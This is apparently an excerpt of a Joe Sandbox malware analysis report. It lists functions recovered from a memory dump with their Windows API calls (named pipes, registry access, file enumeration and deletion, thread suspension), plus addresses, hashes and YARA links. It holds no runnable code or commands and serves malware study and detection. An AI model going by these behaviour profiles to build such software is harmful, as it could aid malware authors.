_allmul.NTDLL(00000000,FF676980,000000FF), ref: 0303288B
SwitchToThread.KERNEL32 ref: 030328A7
ReleaseMutex.KERNEL32(?), ref: 030328B1
WaitForSingleObject.KERNEL32(?,00000000), ref: 030328C6

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Wait$MutexRelease_allmul$MultipleObjectsThreadTimerWaitable$CreateErrorEventFreeHeapLastObjectSingleSwitchTime$ExitFileOpenResetSystemTrimUserVersionmemcpywsprintf
String ID:
API String ID: 2180537439-0
Opcode ID: bb222ca6498efb5ec5cc3a226e8d0aaac79b34fa3f5a131748da5ae641fe3cdb
Instruction ID: a18d9fe64859da6e400cf18062405bceb2857cab783150ad98a7631f07dec039
Opcode Fuzzy Hash: bb222ca6498efb5ec5cc3a226e8d0aaac79b34fa3f5a131748da5ae641fe3cdb
Instruction Fuzzy Hash: C6F1BBB540A345AFC750EF68CD8096BBBECFB85354F044E2EF5A1A21A0D735DA048F52

Uniqueness

Uniqueness Score: -1.00%

Function 0303E5B7 Relevance: 25.7, APIs: 17, Instructions: 225memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,00000000), ref: 0303E5D4
GetTickCount.KERNEL32 ref: 0303E5ED
QueryPerformanceFrequency.KERNEL32(?), ref: 0303E64B
QueryPerformanceCounter.KERNEL32(?), ref: 0303E655
_aulldiv.NTDLL(?,?,?,?), ref: 0303E667
HeapFree.KERNEL32(00000000,?), ref: 0303E6CD
HeapFree.KERNEL32(00000000,?), ref: 0303E702
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0303E756
GetTickCount.KERNEL32 ref: 0303E766
RtlEnterCriticalSection.NTDLL(0304838C), ref: 0303E77A
RtlLeaveCriticalSection.NTDLL(0304838C), ref: 0303E798

Part of subcall function 03035701: lstrcat.KERNEL32(00000000,?), ref: 03035756
Part of subcall function 03035701: StrTrimA.SHLWAPI(00000000,03043FE8,00000000,00000000,?,?,030430F0,0303C5F4,00000000,030483CC), ref: 03035773

StrTrimA.SHLWAPI(00000000,030433F8,?,030483CC), ref: 0303E7CC

Part of subcall function 03034D3D: lstrcpy.KERNEL32(00000000,03048370), ref: 03034D69
Part of subcall function 03034D3D: lstrcat.KERNEL32(00000000,?), ref: 03034D74

HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0303E856

Part of subcall function 03023C07: WaitForSingleObject.KERNEL32(00000000,00000000,03048368,?,0303A46E,00000000,03048368,00000000,00000000,?,00000000,00000000,?,00000000,00000000), ref: 03023CBA

HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 0303E847

Part of subcall function 030357B1: RtlEnterCriticalSection.NTDLL(0304838C), ref: 030357BE
Part of subcall function 030357B1: RtlLeaveCriticalSection.NTDLL(0304838C), ref: 03035817

HeapFree.KERNEL32(00000000,00000000,?,030483CC), ref: 0303E865
HeapFree.KERNEL32(00000000,00000000), ref: 0303E876
HeapFree.KERNEL32(00000000,?), ref: 0303E887

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$Free$CriticalSection$AllocateCountEnterLeavePerformanceQueryTickTrimlstrcat$CounterFrequencyObjectSingleWait_aulldivlstrcpy
String ID:
API String ID: 627794858-0
Opcode ID: b5e8e5b98b84f6e19cc39ff25e9f126e2cccad7b50c2bf9b502ef9aae1270bcf
Instruction ID: 3470d4533d88f6145ff62d240d6620dc49e8ba00c680d1a991d83d85b74e3cfc
Opcode Fuzzy Hash: b5e8e5b98b84f6e19cc39ff25e9f126e2cccad7b50c2bf9b502ef9aae1270bcf
Instruction Fuzzy Hash: 9B819EBA502209EFDB11EFA8ED84F9A3BB8FB08700F044561F908D6254D779EA25DF54

Uniqueness

Uniqueness Score: -1.00%

Function 03026E5E Relevance: 24.1, APIs: 16, Instructions: 131memoryregistrythreadCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03026E80
RtlEnterCriticalSection.NTDLL(03048088), ref: 03026E9D
CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 03026EED
DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 03026EF7
GetLastError.KERNEL32 ref: 03026F01
HeapFree.KERNEL32(00000000,00000000), ref: 03026F12
HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 03026F34
HeapFree.KERNEL32(00000000,?), ref: 03026F6B
RtlLeaveCriticalSection.NTDLL(03048088), ref: 03026F7F
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 03026F88
SuspendThread.KERNEL32(00000000), ref: 03026F97
CreateEventA.KERNEL32(03048208,00000001,00000000), ref: 03026FAB
SetEvent.KERNEL32(00000000), ref: 03026FB8
CloseHandle.KERNEL32(00000000), ref: 03026FBF
Sleep.KERNEL32(000001F4), ref: 03026FD2
ResumeThread.KERNEL32(00000000), ref: 03026FF6

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
String ID:
API String ID: 1011176505-0
Opcode ID: ee8aa92b261466a4d3e060acaab021e45eed98fc0d8f69e941bbf6766940512c
Instruction ID: 50a3c0b531bee62b488470314af314bf6fd03f4ecd2569e6e0cdb2124b6a70bf
Opcode Fuzzy Hash: ee8aa92b261466a4d3e060acaab021e45eed98fc0d8f69e941bbf6766940512c
Instruction Fuzzy Hash: FF418EBA902219EFDF50FFA4EE889ADBFB9FB04304B1485A9F50192114C7765BA1CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0302442D Relevance: 21.3, APIs: 14, Instructions: 258memorystringfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 03024442

Part of subcall function 03031577: memset.NTDLL ref: 03031617
Part of subcall function 03031577: FindFirstFileW.KERNEL32(00000000,00000000), ref: 03031632
Part of subcall function 03031577: memset.NTDLL ref: 03031695
Part of subcall function 03031577: wcscpy.NTDLL ref: 030316A7

Part of subcall function 03031577: RtlEnterCriticalSection.NTDLL(?), ref: 03031703
Part of subcall function 03031577: RtlLeaveCriticalSection.NTDLL(?), ref: 0303171F
Part of subcall function 03031577: FindNextFileW.KERNEL32(?,00000000), ref: 03031738
Part of subcall function 03031577: WaitForSingleObject.KERNEL32(00000000), ref: 0303174A
Part of subcall function 03031577: FindClose.KERNEL32(?), ref: 0303175F
Part of subcall function 03031577: FindFirstFileW.KERNEL32(00000000,00000000), ref: 03031773

RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 0302449E
memcpy.NTDLL(00000000,?,00000000), ref: 030244B1
lstrcpyW.KERNEL32(00000000,?), ref: 030244C8

Part of subcall function 03031577: FindNextFileW.KERNEL32(?,00000000), ref: 0303180B
Part of subcall function 03031577: WaitForSingleObject.KERNEL32(00000000), ref: 0303181D
Part of subcall function 03031577: FindClose.KERNEL32(?), ref: 03031838

HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 030244F3
HeapFree.KERNEL32(00000000,00000000), ref: 03024565
lstrlenW.KERNEL32(00000000,?), ref: 03024588
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 0302460E
HeapFree.KERNEL32(00000000,?), ref: 0302461E

Part of subcall function 03021C9B: lstrlen.KERNEL32(00000000,00000008,-00000007,?,?,0302E657,00000000,00000000,-00000007,03030969,-00000007,?,?), ref: 03021CAA

CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 03024647
lstrlenW.KERNEL32(03049834,?), ref: 030246C1
DeleteFileW.KERNEL32(?,?), ref: 030246EF
HeapFree.KERNEL32(00000000,?), ref: 030246FD
HeapFree.KERNEL32(00000000,?), ref: 0302471E

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$FindFree$File$lstrlen$CloseCriticalFirstNextObjectSectionSingleWaitmemset$AllocateCreateDeleteDirectoryEnterLeavelstrcpymemcpywcscpy
String ID:
API String ID: 760951041-0
Opcode ID: f1178cc54a03267ff1faf6918ecafc6591fe2ffdbff7ac58eff2bfbddf03672d
Instruction ID: 7b290912165b3b90a00a4cce7e9e7ea41eac0e94d775617fae0627095a92f545
Opcode Fuzzy Hash: f1178cc54a03267ff1faf6918ecafc6591fe2ffdbff7ac58eff2bfbddf03672d
Instruction Fuzzy Hash: A59178F9503229BFDB50EFA8ED88CEB7BACFB49340B048966F50586115D335AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 030334EC Relevance: 21.2, APIs: 14, Instructions: 224memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0302DCFB: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0302DD47
Part of subcall function 0302DCFB: RegCloseKey.KERNELBASE(?,?,?,?,0302508A,?,?,?,?,?,00000001), ref: 0302DD8B

HeapFree.KERNEL32(00000000,?,00000000,?,?,030430C0,00000000,00000000), ref: 03033533
RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 03033551
HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0303357D
HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 030335EC
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 030336AF
wsprintfA.USER32 ref: 030336CA
lstrlen.KERNEL32(00000000,00000000), ref: 030336D5
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 030336EC
HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000000,00000000,?,?), ref: 0303370E
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03033729
wsprintfA.USER32 ref: 03033740
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0303374B

Part of subcall function 03030EDC: lstrlen.KERNEL32(03023A9F,00000000,?,?,?,?,03023A9F,00000035,00000000,?,00000000), ref: 03030F0C
Part of subcall function 03030EDC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 03030F22
Part of subcall function 03030EDC: memcpy.NTDLL(00000010,03023A9F,00000000,?,?,03023A9F,00000035,00000000), ref: 03030F58
Part of subcall function 03030EDC: memcpy.NTDLL(00000010,00000000,00000035,?,?,03023A9F,00000035), ref: 03030F73
Part of subcall function 03030EDC: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 03030F91
Part of subcall function 03030EDC: GetLastError.KERNEL32(?,?,03023A9F,00000035), ref: 03030F9B
Part of subcall function 03030EDC: HeapFree.KERNEL32(00000000,00000000,?,?,03023A9F,00000035), ref: 03030FBE

HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03033762
HeapFree.KERNEL32(00000000,?,?,00000001,00000000,?,00000000,00000000,?,?), ref: 03033772

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$Free$Allocate$lstrlen$memcpywsprintf$CallCloseErrorLastNamedPipe
String ID:
API String ID: 170068906-0
Opcode ID: 5b1293007bc86af621e68f272c9ca6fdf04f4a6001abe8a6845cdad13222f19a
Instruction ID: 40473a31889b77d1ac9fb14463931f2f250c54f469e7684cf1760a723f2b3434
Opcode Fuzzy Hash: 5b1293007bc86af621e68f272c9ca6fdf04f4a6001abe8a6845cdad13222f19a
Instruction Fuzzy Hash: 098189BD902219FFDB61EFA4DD88DAEBBBCFF09244B0445A9F601A6210C7355E50DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0303C75F Relevance: 19.6, APIs: 13, Instructions: 141synchronizationpipethreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0303C791
WaitForSingleObject.KERNEL32(030481C8,00000000), ref: 0303C7B3
ConnectNamedPipe.KERNEL32(?,?), ref: 0303C7D3
GetLastError.KERNEL32 ref: 0303C7DD
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0303C801
FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 0303C844
WaitForSingleObject.KERNEL32(00000000), ref: 0303C856
CloseHandle.KERNEL32(?), ref: 0303C86B
GetLastError.KERNEL32 ref: 0303C878
CloseHandle.KERNEL32(?), ref: 0303C885
RtlExitUserThread.NTDLL(000000FF), ref: 0303C89B
GetLastError.KERNEL32 ref: 0303C8DC
SetLastError.KERNEL32(000000E8), ref: 0303C8EE

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorLast$Wait$CloseHandleObjectSingle$BuffersConnectCreateEventExitFileFlushMultipleNamedObjectsPipeThreadUser
String ID:
API String ID: 4198606916-0
Opcode ID: 7f14de47ef6d629bc32eb87c972a3446c7d243b53e802057283497ee81d8188b
Instruction ID: 655f8554029c0d0411403d40a10bb395a03b049eb61a9a7ca85ea54087043dc6
Opcode Fuzzy Hash: 7f14de47ef6d629bc32eb87c972a3446c7d243b53e802057283497ee81d8188b
Instruction Fuzzy Hash: C64191B9405304BFE700EF68DC489AEBBECFB49320F004A69F965E21A0D7749B548B91

Uniqueness

Uniqueness Score: -1.00%

Function 0303AD05 Relevance: 18.2, APIs: 12, Instructions: 186synchronizationstringthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0303AD2C
memcpy.NTDLL(?,?,00000010), ref: 0303AD4F
memset.NTDLL ref: 0303AD9B
lstrcpyn.KERNEL32(?,?,00000034), ref: 0303ADAF
GetLastError.KERNEL32 ref: 0303ADDD
GetLastError.KERNEL32 ref: 0303AE24
GetLastError.KERNEL32 ref: 0303AE43
WaitForSingleObject.KERNEL32(?,000927C0), ref: 0303AE7D
WaitForSingleObject.KERNEL32(?,00000000), ref: 0303AE8B
GetLastError.KERNEL32 ref: 0303AF0E
ReleaseMutex.KERNEL32(?), ref: 0303AF20
RtlExitUserThread.NTDLL(?), ref: 0303AF36

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
String ID:
API String ID: 4037736292-0
Opcode ID: 048071edb5b5d6112bb6c8b86c13eb01e71f815467fd2bae0b44b98a3d18b147
Instruction ID: ac524cfd488517cf0f4bde18f4386e415b1e83b09d43737d6507ec3d5f4c0ad8
Opcode Fuzzy Hash: 048071edb5b5d6112bb6c8b86c13eb01e71f815467fd2bae0b44b98a3d18b147
Instruction Fuzzy Hash: 60618FB9A06301AFC761EF25D948A6BB7ECBF89B10F048A1DF59682184D774D904CF52

Uniqueness

Uniqueness Score: -1.00%

Function 03040EC8 Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 03040EDF
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,0303A79B,00000000,00000094,00000001,00000000,00000094,00000000,?,0302C1CF,00000000), ref: 03040EF1
StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,0303A79B,00000000,00000094,00000001,00000000,00000094,00000000,?,0302C1CF,00000000), ref: 03040EFE
wsprintfA.USER32 ref: 03040F19
CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,00000094,00000000,?,0302C1CF,00000000), ref: 03040F2F
GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 03040F48
WriteFile.KERNEL32(00000000,00000000), ref: 03040F50
GetLastError.KERNEL32 ref: 03040F5E
CloseHandle.KERNEL32(00000000), ref: 03040F67
GetLastError.KERNEL32(?,00000000,?,0303A79B,00000000,00000094,00000001,00000000,00000094,00000000,?,0302C1CF,00000000), ref: 03040F78
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,0303A79B,00000000,00000094,00000001,00000000,00000094,00000000,?,0302C1CF,00000000), ref: 03040F88

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
String ID:
API String ID: 3873609385-0
Opcode ID: 973fef832fae0c059b49d6f4f65a67b6a663508453f35d14de0f0263e75e64c1
Instruction ID: ab3fbc5e5bea2855312393948b359c1ecff3de1d2d9a0b525e7eeaae639404f4
Opcode Fuzzy Hash: 973fef832fae0c059b49d6f4f65a67b6a663508453f35d14de0f0263e75e64c1
Instruction Fuzzy Hash: FD1102F92432187FE261BA74AD8CF7BBAACEB41655F040275FA46D2044DB291F118671

Uniqueness

Uniqueness Score: -1.00%

Function 0302E258 Relevance: 15.3, APIs: 10, Instructions: 308memorythreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0302E2D8
VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0302E2F7
GetLastError.KERNEL32 ref: 0302E4A8
GetLastError.KERNEL32 ref: 0302E52A
SwitchToThread.KERNEL32(?,?,?,?), ref: 0302E573
GetLastError.KERNEL32 ref: 0302E5C5
GetLastError.KERNEL32 ref: 0302E5D4
RtlEnterCriticalSection.NTDLL(?), ref: 0302E5E4
RtlLeaveCriticalSection.NTDLL(?), ref: 0302E5F5
RtlExitUserThread.NTDLL(?), ref: 0302E603

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorLast$AllocCriticalSectionThreadVirtual$EnterExitLeaveSwitchUser
String ID:
API String ID: 1601105880-0
Opcode ID: 1d53fa8c366b123b216a7f6524246ec78c74ca7d9316f5d9734d8c5787f8a16c
Instruction ID: 535178225a14bc865eb42ac2598d5432c9ef8ba0081f302ccfbfbcb06d45423f
Opcode Fuzzy Hash: 1d53fa8c366b123b216a7f6524246ec78c74ca7d9316f5d9734d8c5787f8a16c
Instruction Fuzzy Hash: 2BC14AB5542329AFEB20DF61CD88AAA7BF9FF08304F2445A9F925D2160EB34D954CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0302BFC4 Relevance: 15.2, APIs: 10, Instructions: 206memorystringthreadCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000001,?,?), ref: 0302C0F3
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0302C115
lstrcpy.KERNEL32(00000020,?), ref: 0302C134
lstrlen.KERNEL32(?), ref: 0302C13E
memcpy.NTDLL(?,?,?), ref: 0302C17F
memcpy.NTDLL(?,?,?), ref: 0302C192
SwitchToThread.KERNEL32(?,00000000,?,?), ref: 0302C1B6
HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 0302C1D8
HeapFree.KERNEL32(00000000,?,?,00000001,?,?), ref: 0302C1FE
HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?), ref: 0302C21A

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$Free$lstrlenmemcpy$AllocateSwitchThreadlstrcpy
String ID:
API String ID: 1207300034-0
Opcode ID: 9822daea99707cba5960af73935b43e03aa275f741e2ac652e0fb588a87dbbbd
Instruction ID: fc56ba1d8b3baa6201de6e764bb0482a1257215c06d7e5823bdb3246331c36d0
Opcode Fuzzy Hash: 9822daea99707cba5960af73935b43e03aa275f741e2ac652e0fb588a87dbbbd
Instruction Fuzzy Hash: E0717975506311AFE721DF68D884B9EBBE8FF88304F084A2EF599D2210D735E644CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03027BFF Relevance: 15.1, APIs: 10, Instructions: 103registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03027C27

Part of subcall function 030303AF: RegCloseKey.ADVAPI32(?,?,0302F6FE,00000000,00000000,?), ref: 03030436

lstrcmpiW.KERNEL32(0302F7F1,?,?,0302F7F1,00000000,?,?,?,0302F7F1,00000000,00000001,00000000), ref: 03027C56
lstrlenW.KERNEL32(?,?,0302F7F1,00000000,?,?,?,0302F7F1,00000000,00000001,00000000), ref: 03027C67
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 03027CA1
RegCloseKey.ADVAPI32(?,?,?,?,0302F7F1,00000000,00000001,00000000), ref: 03027CCC
RtlEnterCriticalSection.NTDLL(03048088), ref: 03027CE2
HeapFree.KERNEL32(00000000,00000000,?,?,?,0302F7F1,00000000,00000001,00000000), ref: 03027CF7
RtlLeaveCriticalSection.NTDLL(03048088), ref: 03027D0B
HeapFree.KERNEL32(00000000,0302F7F1,?,?,?,0302F7F1,00000000,00000001,00000000), ref: 03027D20
RegCloseKey.ADVAPI32(?,?,?,?,0302F7F1,00000000,00000001,00000000), ref: 03027D29

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenlstrcmpilstrlen
String ID:
API String ID: 4138089493-0
Opcode ID: 46c2e0c1ff9b1a81b2a338a456177c7ffd743b35b141cedea417365563143668
Instruction ID: c9665566be4165661ef76201ec614553fb5051e4af3e2183789684c541866352
Opcode Fuzzy Hash: 46c2e0c1ff9b1a81b2a338a456177c7ffd743b35b141cedea417365563143668
Instruction Fuzzy Hash: 27319CB9502118BFCB11EFA8DD88DAE7FBDFB48700B1485A9F505D2029D3368B51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 03027C03 Relevance: 15.1, APIs: 10, Instructions: 102registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03027C27

Part of subcall function 030303AF: RegCloseKey.ADVAPI32(?,?,0302F6FE,00000000,00000000,?), ref: 03030436

lstrcmpiW.KERNEL32(0302F7F1,?,?,0302F7F1,00000000,?,?,?,0302F7F1,00000000,00000001,00000000), ref: 03027C56
lstrlenW.KERNEL32(?,?,0302F7F1,00000000,?,?,?,0302F7F1,00000000,00000001,00000000), ref: 03027C67
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 03027CA1
RegCloseKey.ADVAPI32(?,?,?,?,0302F7F1,00000000,00000001,00000000), ref: 03027CCC
RtlEnterCriticalSection.NTDLL(03048088), ref: 03027CE2
HeapFree.KERNEL32(00000000,00000000,?,?,?,0302F7F1,00000000,00000001,00000000), ref: 03027CF7
RtlLeaveCriticalSection.NTDLL(03048088), ref: 03027D0B
HeapFree.KERNEL32(00000000,0302F7F1,?,?,?,0302F7F1,00000000,00000001,00000000), ref: 03027D20
RegCloseKey.ADVAPI32(?,?,?,?,0302F7F1,00000000,00000001,00000000), ref: 03027D29

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenlstrcmpilstrlen
String ID:
API String ID: 4138089493-0
Opcode ID: 0fb03f6556e422d7795784a7457ac135405fdcf60ecd3f193279c07d8a09b8a5
Instruction ID: 76e1d40fbabd857e458665802302ed6afb6db2102c68c871a7b7f00c2ca9e7d4
Opcode Fuzzy Hash: 0fb03f6556e422d7795784a7457ac135405fdcf60ecd3f193279c07d8a09b8a5
Instruction Fuzzy Hash: D1319CB9502118BFCB11EFA8DD88DAE7FBDFB48700B1484A5F505D2029D3368B51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0302F425 Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0302F435
CreateFileW.KERNEL32(0303A5EC,80000000,00000003,03048208,00000003,00000000,00000000,?,0303A5EC,00000000,?,0302C1CF,00000000), ref: 0302F452
GetLastError.KERNEL32(?,0303A5EC,00000000,?,0302C1CF,00000000), ref: 0302F4FA

Part of subcall function 030249F2: lstrlen.KERNEL32(?,00000000,?,00000027), ref: 03024A28
Part of subcall function 030249F2: lstrcpy.KERNEL32(00000000,00000000), ref: 03024A4C
Part of subcall function 030249F2: lstrcat.KERNEL32(00000000,00000000), ref: 03024A54

GetFileSize.KERNEL32(0303A5EC,00000000,?,0303A5EC,00000000,?,0302C1CF,00000000), ref: 0302F485
CreateFileMappingA.KERNEL32(0303A5EC,03048208,00000002,00000000,00000000,0303A5EC), ref: 0302F499
lstrlen.KERNEL32(0303A5EC,?,0303A5EC,00000000,?,0302C1CF,00000000), ref: 0302F4B5
lstrcpy.KERNEL32(?,0303A5EC), ref: 0302F4C5
GetLastError.KERNEL32(?,0303A5EC,00000000,?,0302C1CF,00000000), ref: 0302F4CD
HeapFree.KERNEL32(00000000,0303A5EC,?,0303A5EC,00000000,?,0302C1CF,00000000), ref: 0302F4E0
CloseHandle.KERNEL32(0303A5EC,?,0303A5EC), ref: 0302F4F2

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
String ID:
API String ID: 194907169-0
Opcode ID: c23f32a0ce77d79cbf24b3e3c5c819eeacf9351773a698d9b4e31b020e4a1b69
Instruction ID: 17fa3d9cfe29dd4ca545917a6fd9f51cdf3fb1ecb3a211dfd3eff05430416ea5
Opcode Fuzzy Hash: c23f32a0ce77d79cbf24b3e3c5c819eeacf9351773a698d9b4e31b020e4a1b69
Instruction Fuzzy Hash: 4E217CB8802218FFDB10AFA4D948A9EBFB9FB04350F108669F549E2254D3755B54CF50

Uniqueness

Uniqueness Score: -1.00%

Function 03021D82 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

memset.NTDLL ref: 03021DB0
StrTrimA.SHLWAPI(?,03043FCC), ref: 03021E3F
StrTrimA.SHLWAPI(00000001,03043FCC), ref: 03021E5E
_strupr.NTDLL ref: 03021E65
StrTrimA.SHLWAPI(?,?), ref: 03021E72
memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 03021EBA
lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,00000000,00000000,?,?), ref: 03021ED9

Strings

;, xrefs: 03021E18

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
String ID: ;
API String ID: 4019332941-1661535913
Opcode ID: 3e7181c9f0976e3180cfe83b9813133a96914a687d8afde85ccd09e2c4965983
Instruction ID: b70b7e264fc96b7642886cad309d4faf25be84b15fd930fcb8c3c5c85dee27cf
Opcode Fuzzy Hash: 3e7181c9f0976e3180cfe83b9813133a96914a687d8afde85ccd09e2c4965983
Instruction Fuzzy Hash: B241F7B55063169FD755EF28CC44B6BBFE8EF48600F080859F8A5DB242DB74D5058B61

Uniqueness

Uniqueness Score: -1.00%

Function 030347CE Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 136timeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0303480B
OpenWaitableTimerA.KERNEL32(00100000,00000000,?), ref: 0303481F
CloseHandle.KERNEL32(00000000), ref: 0303494A

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

memset.NTDLL ref: 0303484B
GetLastError.KERNEL32(?,?,00000040), ref: 03034883

Strings

W, xrefs: 03034950

Memory Dump Source

